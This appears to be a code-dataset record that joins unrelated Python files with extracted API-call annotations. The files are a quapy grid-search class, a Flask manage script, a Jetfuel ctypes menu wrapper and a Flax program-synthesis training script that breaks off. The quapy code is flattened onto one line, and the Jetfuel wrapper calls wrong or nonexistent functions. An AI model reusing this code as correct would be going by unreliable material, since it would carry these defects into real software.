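class GetSubscriptionResult:
    # Generated result classes store every field through pulumi.set(...) in __init__
    # and read it back through pulumi.get(...) in a property decorated with
    # @pulumi.getter, which maps the camelCase wire name to the snake_case attribute.
    def __init__(__self__, accessed_at=None, lock_duration=None):
        pulumi.set(__self__, 'accessed_at', accessed_at)
        pulumi.set(__self__, 'lock_duration', lock_duration)

    @property
    @pulumi.getter(name='accessedAt')
    def accessed_at(self):
        return pulumi.get(self, 'accessed_at')

    @property
    @pulumi.getter(name='lockDuration')
    def lock_duration(self):
        return pulumi.get(self, 'lock_duration')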
import itertools import signal from copy import deepcopy from typing import Union, Callable import numpy as np import quapy as qp from quapy.data.base import LabelledCollection from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction from quapy.method.aggregative import BaseQuantifier import inspect from util import _check_sample_size class GridSearchQ(BaseQuantifier): """Grid Search optimization targeting a quantification-oriented metric. Optimizes the hyperparameters of a quantification method, based on an evaluation method and on an evaluation protocol for quantification. :param model: the quantifier to optimize :type model: BaseQuantifier :param param_grid: a dictionary with keys the parameter names and values the list of values to explore :param sample_size: the size of the samples to extract from the validation set (ignored if protocl='gen') :param protocol: either 'app' for the artificial prevalence protocol, 'npp' for the natural prevalence protocol, or 'gen' for using a custom sampling generator function :param n_prevpoints: if specified, indicates the number of equally distant points to extract from the interval [0,1] in order to define the prevalences of the samples; e.g., if n_prevpoints=5, then the prevalences for each class will be explored in [0.00, 0.25, 0.50, 0.75, 1.00]. If not specified, then eval_budget is requested. Ignored if protocol!='app'. :param n_repetitions: the number of repetitions for each combination of prevalences. This parameter is ignored for the protocol='app' if eval_budget is set and is lower than the number of combinations that would be generated using the value assigned to n_prevpoints (for the current number of classes and n_repetitions). Ignored for protocol='npp' and protocol='gen' (use eval_budget for setting a maximum number of samples in those cases). :param eval_budget: if specified, sets a ceil on the number of evaluations to perform for each hyper-parameter combination. For example, if protocol='app', there are 3 classes, n_repetitions=1 and eval_budget=20, then n_prevpoints will be set to 5, since this will generate 15 different prevalences, i.e., [0, 0, 1], [0, 0.25, 0.75], [0, 0.5, 0.5] ... [1, 0, 0], and since setting it to 6 would generate more than 20. When protocol='gen', indicates the maximum number of samples to generate, but less samples will be generated if the generator yields less samples. :param error: an error function (callable) or a string indicating the name of an error function (valid ones are those in qp.error.QUANTIFICATION_ERROR :param refit: whether or not to refit the model on the whole labelled collection (training+validation) with the best chosen hyperparameter combination. Ignored if protocol='gen' :param val_split: either a LabelledCollection on which to test the performance of the different settings, or a float in [0,1] indicating the proportion of labelled data to extract from the training set, or a callable returning a generator function each time it is invoked (only for protocol='gen'). :param n_jobs: number of parallel jobs :param random_seed: set the seed of the random generator to replicate experiments. Ignored if protocol='gen'. :param timeout: establishes a timer (in seconds) for each of the hyperparameters configurations being tested. Whenever a run takes longer than this timer, that configuration will be ignored. If all configurations end up being ignored, a TimeoutError exception is raised. If -1 (default) then no time bound is set. 
:param verbose: set to True to get information through the stdout """ def __init__(self, model: BaseQuantifier, param_grid: dict, sample_size: Union[int, None] = None, protocol='app', n_prevpoints: int = None, n_repetitions: int = 1, eval_budget: int = None, error: Union[Callable, str] = qp.error.mae, refit=True, val_split=0.4, n_jobs=1, random_seed=42, timeout=-1, verbose=False): self.model = model self.param_grid = param_grid self.sample_size = sample_size self.protocol = protocol.lower() self.n_prevpoints = n_prevpoints self.n_repetitions = n_repetitions self.eval_budget = eval_budget self.refit = refit self.val_split = val_split self.n_jobs = n_jobs self.random_seed = random_seed self.timeout = timeout self.verbose = verbose self.__check_error(error) assert self.protocol in {'app', 'npp', 'gen'}, \ 'unknown protocol: valid ones are "app" or "npp" for the "artificial" or the "natural" prevalence ' \ 'protocols. Use protocol="gen" when passing a generator function thorough val_split that yields a ' \ 'sample (instances) and their prevalence (ndarray) at each iteration.' assert self.eval_budget is None or isinstance(self.eval_budget, int) if self.protocol in ['npp', 'gen']: if self.protocol=='npp' and (self.eval_budget is None or self.eval_budget <= 0): raise ValueError(f'when protocol="npp" the parameter eval_budget should be ' f'indicated (and should be >0).') if self.n_repetitions != 1: print('[warning] n_repetitions has been set and will be ignored for the selected protocol') def _sout(self, msg): if self.verbose: print(f'[{self.__class__.__name__}]: {msg}') def __check_training_validation(self, training, validation): if isinstance(validation, LabelledCollection): return training, validation elif isinstance(validation, float): assert 0. < validation < 1., 'validation proportion should be in (0,1)' training, validation = training.split_stratified(train_prop=1 - validation, random_state=self.random_seed) return training, validation elif self.protocol=='gen' and inspect.isgenerator(validation()): return training, validation else: raise ValueError(f'"validation" must either be a LabelledCollection or a float in (0,1) indicating the' f'proportion of training documents to extract (type found: {type(validation)}). 
' f'Optionally, "validation" can be a callable function returning a generator that yields ' f'the sample instances along with their true prevalence at each iteration by ' f'setting protocol="gen".') def __check_error(self, error): if error in qp.error.QUANTIFICATION_ERROR: self.error = error elif isinstance(error, str): self.error = qp.error.from_name(error) elif hasattr(error, '__call__'): self.error = error else: raise ValueError(f'unexpected error type; must either be a callable function or a str representing\n' f'the name of an error function in {qp.error.QUANTIFICATION_ERROR_NAMES}') def __generate_predictions(self, model, val_split): commons = { 'n_repetitions': self.n_repetitions, 'n_jobs': self.n_jobs, 'random_seed': self.random_seed, 'verbose': False } if self.protocol == 'app': return artificial_prevalence_prediction( model, val_split, self.sample_size, n_prevpoints=self.n_prevpoints, eval_budget=self.eval_budget, **commons ) elif self.protocol == 'npp': return natural_prevalence_prediction( model, val_split, self.sample_size, **commons) elif self.protocol == 'gen': return gen_prevalence_prediction(model, gen_fn=val_split, eval_budget=self.eval_budget) else: raise ValueError('unknown protocol') def fit(self, training: LabelledCollection, val_split: Union[LabelledCollection, float, Callable] = None): """ Learning routine. Fits methods with all combinations of hyperparameters and selects the one minimizing the error metric. :param training: the training set on which to optimize the hyperparameters :param val_split: either a LabelledCollection on which to test the performance of the different settings, or a float in [0,1] indicating the proportion of labelled data to extract from the training set :return: self """ if val_split is None: val_split = self.val_split training, val_split = self.__check_training_validation(training, val_split) if self.protocol != 'gen': self.sample_size = _check_sample_size(self.sample_size) params_keys = list(self.param_grid.keys()) params_values = list(self.param_grid.values()) model = self.model if self.timeout > 0: def handler(signum, frame): self._sout('timeout reached') raise TimeoutError() signal.signal(signal.SIGALRM, handler) self.param_scores_ = {} self.best_score_ = None some_timeouts = False for values in itertools.product(*params_values): params = dict({k: values[i] for i, k in enumerate(params_keys)}) if self.timeout > 0: signal.alarm(self.timeout) try: # overrides default parameters with the parameters being explored at this iteration model.set_params(**params) model.fit(training) true_prevalences, estim_prevalences = self.__generate_predictions(model, val_split) score = self.error(true_prevalences, estim_prevalences) self._sout(f'checking hyperparams={params} got {self.error.__name__} score {score:.5f}') if self.best_score_ is None or score < self.best_score_: self.best_score_ = score self.best_params_ = params self.best_model_ = deepcopy(model) self.param_scores_[str(params)] = score if self.timeout > 0: signal.alarm(0) except TimeoutError: print(f'timeout reached for config {params}') some_timeouts = True if self.best_score_ is None and some_timeouts: raise TimeoutError('all jobs took more than the timeout time to end') self._sout(f'optimization finished: best params {self.best_params_} (score={self.best_score_:.5f})') if self.refit: self._sout(f'refitting on the whole development set') self.best_model_.fit(training + val_split) return self def quantify(self, instances): """Estimate class prevalence values using the best model found after 
calling the :meth:`fit` method. :param instances: sample contanining the instances :return: a ndarray of shape `(n_classes)` with class prevalence estimates as according to the best model found by the model selection process. """ assert hasattr(self, 'best_model_'), 'quantify called before fit' return self.best_model().quantify(instances) @property def classes_(self): """ Classes on which the quantifier has been trained on. :return: a ndarray of shape `(n_classes)` with the class identifiers """ return self.best_model().classes_ def set_params(self, **parameters): """Sets the hyper-parameters to explore. :param parameters: a dictionary with keys the parameter names and values the list of values to explore """ self.param_grid = parameters def get_params(self, deep=True): """Returns the dictionary of hyper-parameters to explore (`param_grid`) :param deep: Unused :return: the dictionary `param_grid` """ return self.param_grid def best_model(self): """ Returns the best model found after calling the :meth:`fit` method, i.e., the one trained on the combination of hyper-parameters that minimized the error function. :return: a trained quantifier """ if hasattr(self, 'best_model_'): return self.best_model_ raise ValueError('best_model called before fit')
[ "quapy.evaluation.natural_prevalence_prediction", "signal.signal", "util._check_sample_size", "itertools.product", "quapy.error.from_name", "quapy.evaluation.artificial_prevalence_prediction", "quapy.evaluation.gen_prevalence_prediction", "signal.alarm", "copy.deepcopy" ]
[((9694, 9727), 'itertools.product', 'itertools.product', (['*params_values'], {}), '(*params_values)\n', (9711, 9727), False, 'import itertools\n'), ((7798, 7943), 'quapy.evaluation.artificial_prevalence_prediction', 'artificial_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {'n_prevpoints': 'self.n_prevpoints', 'eval_budget': 'self.eval_budget'}), '(model, val_split, self.sample_size,\n n_prevpoints=self.n_prevpoints, eval_budget=self.eval_budget, **commons)\n', (7830, 7943), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((9200, 9236), 'util._check_sample_size', '_check_sample_size', (['self.sample_size'], {}), '(self.sample_size)\n', (9218, 9236), False, 'from util import _check_sample_size\n'), ((9538, 9576), 'signal.signal', 'signal.signal', (['signal.SIGALRM', 'handler'], {}), '(signal.SIGALRM, handler)\n', (9551, 9576), False, 'import signal\n'), ((7169, 7194), 'quapy.error.from_name', 'qp.error.from_name', (['error'], {}), '(error)\n', (7187, 7194), True, 'import quapy as qp\n'), ((8074, 8150), 'quapy.evaluation.natural_prevalence_prediction', 'natural_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {}), '(model, val_split, self.sample_size, **commons)\n', (8103, 8150), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((9856, 9882), 'signal.alarm', 'signal.alarm', (['self.timeout'], {}), '(self.timeout)\n', (9868, 9882), False, 'import signal\n'), ((8240, 8325), 'quapy.evaluation.gen_prevalence_prediction', 'gen_prevalence_prediction', (['model'], {'gen_fn': 'val_split', 'eval_budget': 'self.eval_budget'}), '(model, gen_fn=val_split, eval_budget=self.eval_budget\n )\n', (8265, 8325), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((10562, 10577), 'copy.deepcopy', 'deepcopy', (['model'], {}), '(model)\n', (10570, 10577), False, 'from copy import deepcopy\n'), ((10692, 10707), 'signal.alarm', 'signal.alarm', (['(0)'], {}), '(0)\n', (10704, 10707), False, 'import signal\n')]
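Taken together, the record above pairs the GridSearchQ source with the list of library calls it makes and their character spans. As a usage illustration only, here is a hedged sketch of how a GridSearchQ model-selection run is typically wired up; the dataset, base quantifier, parameter grid, and the import path for GridSearchQ are assumptions for the example, not part of the record.

import quapy as qp
from quapy.method.aggregative import PACC
from quapy.model_selection import GridSearchQ  # import path assumed; the record defines the class inline
from sklearn.linear_model import LogisticRegression

# Illustrative data and grid: any LabelledCollection-based dataset works the same way.
dataset = qp.datasets.fetch_reviews('kindle', tfidf=True)
param_grid = {'C': [0.1, 1.0, 10.0], 'class_weight': ['balanced', None]}

grid = GridSearchQ(
    model=PACC(LogisticRegression()),
    param_grid=param_grid,
    sample_size=500,        # size of each validation sample
    protocol='app',         # artificial prevalence protocol
    eval_budget=1000,       # cap on evaluations per configuration
    error='mae',            # quantification error to minimize
    refit=True,
    verbose=True)

grid.fit(dataset.training)                           # explores the grid, keeps the best model
prevalences = grid.quantify(dataset.test.instances)  # prevalence estimates from the best model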
# -*- coding: utf-8 -*-
import os

from flask_migrate import Migrate

from app import create_app, db
from app.models import User, Role, PoseToLocation

app = create_app(os.getenv('FLASK_CONFIG') or 'default')
migrate = Migrate(app, db)
# Setting up flask-migrate: these model files must be imported so they can be discovered before migrations are created.


@app.shell_context_processor
def make_shell_context():
    return dict(db=db, User=User, Role=Role, PoseToLocation=PoseToLocation)


# Unit tests
@app.cli.command()
def test():
    """ run the unit tests """
    import unittest
    tests = unittest.TestLoader().discover('tests')
    unittest.TextTestRunner(verbosity=2).run(tests)
[ "unittest.TestLoader", "flask_migrate.Migrate", "unittest.TextTestRunner", "os.getenv" ]
[((220, 236), 'flask_migrate.Migrate', 'Migrate', (['app', 'db'], {}), '(app, db)\n', (227, 236), False, 'from flask_migrate import Migrate\n'), ((170, 195), 'os.getenv', 'os.getenv', (['"""FLASK_CONFIG"""'], {}), "('FLASK_CONFIG')\n", (179, 195), False, 'import os\n'), ((505, 526), 'unittest.TestLoader', 'unittest.TestLoader', ([], {}), '()\n', (524, 526), False, 'import unittest\n'), ((549, 585), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {'verbosity': '(2)'}), '(verbosity=2)\n', (572, 585), False, 'import unittest\n')]
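The small Flask management script in the previous record registers a shell context and a custom test command on the application CLI. A stripped-down sketch of the same registration pattern follows, assuming only that Flask is installed; the application and command names are placeholders, not taken from the record.

from flask import Flask

app = Flask(__name__)


@app.shell_context_processor
def make_shell_context():
    # Everything returned here is pre-imported into a `flask shell` session.
    return dict(app=app)


@app.cli.command()
def smoke():
    """Runs as `flask smoke` once FLASK_APP points at this module (command name is illustrative)."""
    print('smoke test placeholder')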
# Jetfuel Game Engine- A SDL-based 2D game-engine # Copyright (C) 2018 InfernoStudios # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from ctypes import c_uint from ctypes import c_int from ctypes import c_void_p from ctypes import c_bool from ctypes import c_wchar_p from jetfuel.draw.rectangleinterface import rectangle_interface from jetfuel.draw.image import image class menu(rectangle_interface): def __init__(self, jetfuelsoloader, maxheight=None, columngap=None, buttongap=None): self._jetfuel = jetfuelsoloader.jetfuelso; if(maxheight is not None and columngap is not None and buttongap is not None): self._jetfuel.Menu_new_from_heights_and_gaps.argtypes = [c_uint, c_uint, c_uint]; self._jetfuel.Menu_new_from_heights_and_gaps.restype = c_void_p; self.drawableref = self._jetfuel.Menu_new_from_heights_and_gaps( maxheight, columngap, buttongap); else: self._jetfuel.Menu_new.restype = c_void_p; self.drawableref = self._jetfuel.Menu_new(); print("Constructed empty drawableref!"); def get_max_height(self): self._jetfuel.Menu_get_max_height.argtypes = [c_void_p]; self._jetfuel.Menu_get_max_height.restype = c_uint; return self._jetfuel.Menu_get_max_height(self.drawableref); def set_max_height(self, maxheight): self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint]; self._jetfuel.Menu_set_max_height(self.drawableref, maxheight); def get_column_gap(self): self._jetfuel.Menu_get_column_gap.argtypes = [c_void_p]; self._jetfuel.Menu_get_column_gap.restype = c_uint; return self._jetfuel.Menu_get_column_gap(self.drawableref); def set_column_gap(self, columngap): self._jetfuel.Menu_set_column_gap.argtypes = [c_void_p, c_uint]; self._jetfuel.Menu_set_column_height(self.drawableref, columngap); def get_button_gap(self): self._jetfuel.Menu_get_button_gap.argtypes = [c_void_p]; self._jetfuel.Menu_get_button_gap.restype = c_uint; return self._jetfuel.Menu_get_column_gap(self.drawableref); def set_button_gap(self, buttongap): self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint]; self._jetfuel.Menu_set_max_height(self.drawableref, buttongap); def get_container_box_image(self, jetfuelsoloader): self._jetfuel.Menu_get_container_box_image.argtypes = [c_void_p]; self._jetfuel.Menu_get_container_box_image.restype = c_void_p; containerboximage = image(jetfuelsoloader); self._jetfuel.Image_delete.argtypes = [c_void_p]; self._jetfuel.Image_delete(containerboximage.imageref); containerboximage.imageref = self._jetfuel.Menu_get_container_box_image( self.drawableref); return containerboximage; def set_container_box_image(self, image, borderwidth, borderheight): self._jetfuel.Menu_set_container_box_image.argtypes = [c_void_p, c_void_p, c_uint, c_uint]; self._jetfuel.Menu_set_container_box_image(image.imageref, borderwidth, borderheight); def get_container_box_border_width(self): self._jetfuel.Menu_get_container_box_border_width.argtypes = [c_void_p]; self._jetfuel.Menu_get_container_box_border_width.restype = c_uint; return self._jetfuel.Menu_get_container_box_border_width( self.drawableref); def 
get_container_box_border_height(self): self._jetfuel.Menu_get_container_box_border_height.argtypes = [c_void_p]; self._jetfuel.Menu_get_container_box_border_height.restype = c_uint; return self._jetfuel.Menu_get_container_box_border_height( self.drawableref); def add_button(self, buttoncharsreplacement, uisactiontowatchfor, messagetosenduponclick, messagebus): self._jetfuel.Menu_add_button.argtypes = [c_void_p, c_void_p, c_wchar_p, c_wchar_p, c_void_p]; self._jetfuel.Menu_add_button.restype = c_bool; return self._jetfuel.Menu_add_button(self.drawableref, buttoncharsreplacement.buttoncharsref, uisactiontowatchfor, messagetosenduponclick, messagebus.messagebusref); def get_position_x(self): self._jetfuel.Menu_get_position_x.argtypes = [c_void_p]; self._jetfuel.Menu_get_position_x.restype = c_int; return self.Menu_get_position_x(self.drawableref); def get_position_y(self): self._jetfuel.Menu_get_position_y.argtypes = [c_void_p]; self._jetfuel.Menu_get_position_y.restype = c_int; return self.Menu_get_position_y(self.drawableref); def set_position(self, x, y): self._jetfuel.Menu_set_position.argtypes = [c_void_p, c_int, c_int]; self._jetfuel.Menu_set_position(self.drawableref, x, y); def get_rect_to_draw_width(self): self._jetfuel.Menu_get_rect_to_draw_width.argtypes = [c_void_p]; self._jetfuel.Menu_get_rect_to_draw_width.restype = c_int; return self.Menu_get_rect_to_draw_width(self.drawableref); def get_rect_to_draw_height(self): self._jetfuel.Menu_get_rect_to_draw_height.argtypes = [c_void_p]; self._jetfuel.Menu_get_rect_to_draw_height.restype = c_int; return self.Menu_get_rect_to_draw_height(self.drawableref);
[ "jetfuel.draw.image.image" ]
[((3591, 3613), 'jetfuel.draw.image.image', 'image', (['jetfuelsoloader'], {}), '(jetfuelsoloader)\n', (3596, 3613), False, 'from jetfuel.draw.image import image\n')]
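The jetfuel menu wrapper above follows one ctypes idiom throughout: declare argtypes/restype on the foreign function, then call it with the opaque drawable handle. A minimal sketch of that idiom, assuming a hypothetical shared library path and symbol name (neither is taken from the record):

from ctypes import CDLL, c_uint, c_void_p

lib = CDLL('./libexample.so')  # hypothetical shared object path

# Declaring the C signature once lets ctypes marshal arguments and results correctly.
lib.Example_get_max_height.argtypes = [c_void_p]
lib.Example_get_max_height.restype = c_uint


def get_max_height(handle):
    # `handle` is an opaque pointer previously returned by the library.
    return lib.Example_get_max_height(handle)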
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # python3 """Train seq-to-seq model on random supervised training tasks.""" # pytype: disable=wrong-arg-count # pytype: disable=attribute-error import collections import functools import json import os import random import sys import time from absl import app from absl import flags from absl import logging from flax import jax_utils from flax import linen as nn from flax import optim from flax.metrics import tensorboard from flax.training import checkpoints from flax.training import common_utils import jax import jax.numpy as jnp import numpy as np import tensorflow.compat.v2 as tf from latent_programmer import decode from latent_programmer import models as base_models from latent_programmer.decomposition_transformer_attention import decomposition_models as models from latent_programmer.decomposition_transformer_attention import input_pipeline from latent_programmer.tasks.robust_fill import dsl from latent_programmer.tasks.robust_fill import tokens as dsl_tokens sys.path.append('../../') gfile = tf.io.gfile FLAGS = flags.FLAGS flags.DEFINE_integer('seed', 0, 'Fixed random seed for training.') flags.DEFINE_float('lr', 1e-3, 'Learning rate.') flags.DEFINE_float('weight_decay', 1e-1, 'Decay factor for AdamW-style weight decay.') flags.DEFINE_integer('embedding_dim', 256, 'Embedding dimension.') flags.DEFINE_integer('hidden_dim', 512, 'Hidden dimension.') flags.DEFINE_integer('num_heads', 4, 'Number of layers.') flags.DEFINE_integer('num_layers', 3, 'Number of Transformer heads.') flags.DEFINE_boolean('slow_decode', True, 'Use slow decoding for prediction?') flags.DEFINE_string('dataset_filepattern', None, 'Filepattern for TFRecord dataset.') flags.DEFINE_integer('per_device_batch_size', 16, 'Number of program tasks in a batch.') flags.DEFINE_integer('num_strings_per_task', 4, 'Number of input/output strings per task.') flags.DEFINE_integer('max_program_length', 100, 'Maximum number of tokens in program.') flags.DEFINE_integer('max_characters', 120, 'Maximum number of characters in input/output strings.') flags.DEFINE_string('save_dir', None, 'Directory to save results to.') flags.DEFINE_integer('num_train_steps', 2000000, 'Number of training steps.') flags.DEFINE_integer('num_eval_steps', 10, 'Number of evaluation steps.') flags.DEFINE_integer('log_freq', 1000, 'Number of steps between training logs.') flags.DEFINE_integer('eval_freq', 2000, 'Number of steps between eval.') flags.DEFINE_integer('predict_freq', 50000, 'Number of steps between prediction (beam search).') flags.DEFINE_integer('checkpoint_freq', 50000, 'Number of steps between checkpoint saves.') flags.DEFINE_integer('finetune_start_step', -1, 'Step the initial checkpoint should start at for ' 'finetuning, or -1 if not finetuning.') flags.DEFINE_bool('restore_checkpoints', True, 'Whether to restore from existing model checkpoints.') flags.DEFINE_string('attention_mask_type', 'bos_full_attention', 'The kind of attention mask to use. 
Options are: baseline, ' 'bos_to_bos, bos_full_attention') flags.DEFINE_bool('use_relative_attention', True, 'Whether to use relative positonal embeddings.') flags.DEFINE_bool('bos_special_attention', False, 'Whether to use special relative attention computation for ' 'BOS tokens.') _internal = False if not _internal: flags.DEFINE_string('xm_parameters', None, 'String specifying hyperparamter search.') def create_learning_rate_scheduler( base_learning_rate=0.5, factors='constant * linear_warmup * rsqrt_normalized_decay', warmup_steps=16000, decay_factor=0.5, steps_per_decay=50000, steps_per_cycle=100000): """Creates learning rate schedule. Interprets factors in the factors string which can consist of: * constant: interpreted as the constant value, * linear_warmup: interpreted as linear warmup until warmup_steps, * rsqrt_decay: divide by square root of max(step, warmup_steps) * decay_every: Every k steps decay the learning rate by decay_factor. * cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter. Args: base_learning_rate: float, the starting constant for the lr schedule. factors: a string with factors separated by '*' that defines the schedule. warmup_steps: how many steps to warm up for in the warmup schedule. decay_factor: The amount to decay the learning rate by. steps_per_decay: How often to decay the learning rate. steps_per_cycle: Steps per cycle when using cosine decay. Returns: A function learning_rate(step): float -> {'learning_rate': float}, the step-dependent lr. """ factors = [n.strip() for n in factors.split('*')] def step_fn(step): """Step to learning rate function.""" ret = 1.0 for name in factors: if name == 'constant': ret *= base_learning_rate elif name == 'linear_warmup': ret *= jnp.minimum(1.0, step / warmup_steps) elif name == 'rsqrt_decay': ret /= jnp.sqrt(jnp.maximum(1.0, step - warmup_steps)) elif name == 'rsqrt_normalized_decay': ret *= jnp.sqrt(warmup_steps) ret /= jnp.sqrt(jnp.maximum(step, warmup_steps)) elif name == 'decay_every': ret *= (decay_factor**(step // steps_per_decay)) elif name == 'cosine_decay': progress = jnp.maximum(0.0, (step - warmup_steps) / float(steps_per_cycle)) ret *= jnp.maximum(0.0, 0.5 * (1.0 + jnp.cos(jnp.pi * (progress % 1.0)))) else: raise ValueError('Unknown factor %s.' % name) return jnp.asarray(ret, dtype=jnp.float32) return step_fn def compute_weighted_cross_entropy(logits, targets, weights=None): """Compute weighted cross entropy and entropy for log probs and targets. Args: logits: `[batch, length, num_classes]` float array. targets: categorical targets `[batch, length]` int array. weights: None or array of shape [batch, length, 1] Returns: Tuple of scalar loss and batch normalizing factor. """ if logits.ndim != targets.ndim + 1: raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' % (str(logits.shape), str(targets.shape))) onehot_targets = common_utils.onehot(targets, logits.shape[-1]) loss = -jnp.sum(onehot_targets * nn.log_softmax(logits), axis=-1) normalizing_factor = jnp.prod(jnp.asarray(targets.shape)) if weights is not None: loss = loss * weights normalizing_factor = weights.sum() return loss.sum(), normalizing_factor def compute_weighted_accuracy(logits, targets, weights=None): """Compute weighted accuracy for log probs and targets. Args: logits: `[batch, length, num_classes]` float array. targets: categorical targets `[batch, length]` int array. weights: None or array of shape [batch, length, 1] Returns: Tuple of scalar accuracy and batch normalizing factor. 
""" if logits.ndim != targets.ndim + 1: raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' % (str(logits.shape), str(targets.shape))) acc = jnp.equal(jnp.argmax(logits, axis=-1), targets) normalizing_factor = jnp.prod(jnp.asarray(targets.shape)) if weights is not None: acc = acc * weights normalizing_factor = weights.sum() return acc.sum(), normalizing_factor def compute_metrics(logits, targets, weights): """Compute summary metrics.""" loss, weight_sum = compute_weighted_cross_entropy(logits, targets, weights) acc, _ = compute_weighted_accuracy(logits, targets, weights) metrics = { 'loss': loss, 'accuracy': acc, 'denominator': weight_sum, } metrics = jax.lax.psum(metrics, 'batch') return metrics # Train / eval / decode step functions. # ----------------------------------------------------------------------------- def train_step(optimizer, inputs, outputs, programs, learning_rate_fn, config, dropout_rng): """Train on batch of program tasks.""" # We handle PRNG splitting inside the top pmap, rather # than handling it outside in the training loop - doing the # latter can add some stalls to the devices. dropout_rng, new_dropout_rng = jax.random.split(dropout_rng) weights = jnp.where(programs > 0, 1, 0).astype(jnp.float32) def loss_fn(params): """Loss function used for training.""" logits = models.DecomposeAttentionTransformer(config).apply( {'params': params}, inputs, outputs, programs, rngs={'dropout': dropout_rng}) loss, weight_sum = compute_weighted_cross_entropy(logits, programs, weights) mean_loss = loss / weight_sum return mean_loss, logits step = optimizer.state.step lr = learning_rate_fn(step) grad_fn = jax.value_and_grad(loss_fn, has_aux=True) (_, logits), grad = grad_fn(optimizer.target) grad = jax.lax.pmean(grad, 'batch') new_optimizer = optimizer.apply_gradient(grad, learning_rate=lr) # Get metrics. metrics = compute_metrics(logits, programs, weights) metrics['learning_rate'] = lr return new_optimizer, metrics, new_dropout_rng def eval_step(params, inputs, outputs, programs, eos_token, config): """Collect metrics for evaluation during training.""" weights = jnp.where( jnp.logical_and(programs > 0, jnp.logical_and(programs != config.base_config.bos_token, programs != eos_token)), 1, 0).astype(jnp.float32) logits = models.DecomposeAttentionTransformer(config).apply( {'params': params}, inputs, outputs, programs) return compute_metrics(logits, programs, weights) def initialize_cache(inputs, outputs, programs, max_decode_len, config): """Initialize a cache for a given input shape and max decode length.""" target_shape = (programs.shape[0], max_decode_len) dtype = config.base_config.dtype initial_variables = models.DecomposeAttentionTransformer(config).init( jax.random.PRNGKey(0), jnp.ones(inputs.shape, dtype), jnp.ones(outputs.shape, dtype), jnp.ones(target_shape, dtype)) return initial_variables['cache'] def predict_step(params, inputs, outputs, cache, beam_size, eos_token, max_decode_len, config, slow_decode=True): """Predict translation with fast decoding beam search on a batch.""" # Prepare transformer fast-decoder call for beam search: for beam search, we # need to set up our decoder model to handle a batch size equal to # batch_size * beam_size, where each batch item's data is expanded in-place # rather than tiled. 
flat_encoded = decode.flat_batch_beam_expand( models.DecomposeAttentionTransformer(config).apply( {'params': params}, inputs, outputs, method=models.DecomposeAttentionTransformer.encode), beam_size) encoded_padding_mask = jnp.where(outputs > 0, 1, 0).astype(jnp.float32) flat_encoded_padding_mask = decode.flat_batch_beam_expand( encoded_padding_mask, beam_size) if slow_decode: def tokens_ids_to_logits(flat_ids): """Token slice to logits from decoder model.""" # --> [batch * beam, 1, vocab] flat_logits = models.DecomposeAttentionTransformer(config=config).apply( {'params': params}, flat_ids, flat_encoded, flat_encoded_padding_mask, method=models.DecomposeAttentionTransformer.decode) return flat_logits else: def tokens_ids_to_logits(flat_ids, flat_cache): """Token slice to logits from decoder model.""" # --> [batch * beam, 1, vocab] flat_logits, new_vars = models.DecomposeAttentionTransformer( config=config).apply( {'params': params, 'cache': flat_cache}, flat_ids, flat_encoded, flat_encoded_padding_mask, mutable=['cache'], method=models.DecomposeAttentionTransformer.decode) new_flat_cache = new_vars['cache'] # Remove singleton sequence-length dimension: # [batch * beam, 1, vocab] --> [batch * beam, vocab] flat_logits = flat_logits.squeeze(axis=1) return flat_logits, new_flat_cache # Using the above-defined single-step decoder function, run a # beam search over possible sequences given input encoding. beam_seqs, _ = decode.beam_search( inputs, cache, tokens_ids_to_logits, beam_size=beam_size, alpha=0.6, bos_token=config.base_config.bos_token, eos_token=eos_token, max_decode_len=max_decode_len, slow_decode=slow_decode) # Beam search returns [n_batch, n_beam, n_length] with beam dimension # sorted in increasing order of log-probability. return beam_seqs # Util functions for prediction # ----------------------------------------------------------------------------- def pad_examples(x, desired_batch_size): """Expand batch to desired size by repeating last slice.""" batch_pad = desired_batch_size - x.shape[0] tile_dims = [1] * len(x.shape) tile_dims[0] = batch_pad return np.concatenate([x, np.tile(x[-1], tile_dims)], axis=0) def tohost(x): """Collect batches from all devices to host and flatten batch dimensions.""" n_device, n_batch, *remaining_dims = x.shape return x.reshape((n_device * n_batch,) + tuple(remaining_dims)) def per_host_sum_pmap(in_tree): """Execute psum on in_tree's leaves over one device per host.""" host2devices = collections.defaultdict(list) for d in jax.devices(): host2devices[d.host_id].append(d) devices = [host2devices[k][0] for k in host2devices] host_psum = jax.pmap(lambda x: jax.lax.psum(x, 'i'), 'i', devices=devices) def pre_pmap(xs): return jax.tree_map(lambda x: jnp.broadcast_to(x, (1,) + x.shape), xs) def post_pmap(xs): return jax.tree_map(lambda x: x[0], xs) return post_pmap(host_psum(pre_pmap(in_tree))) def eval_predicted(predicted, inputs, outputs, parse_beam_fn): """Evaluate predicted program beams.""" best_p, best_score = None, -1 # predicted shape [beam_size, length] for beam in predicted[::-1]: try: p = parse_beam_fn(beam) p_outs = [p(inp) for inp in inputs] score = np.sum([p_out == out for p_out, out in zip(p_outs, outputs)]) if score > best_score: best_p, best_score = p, score except: # pylint: disable=bare-except pass if best_score >= len(inputs): # Found solution. 
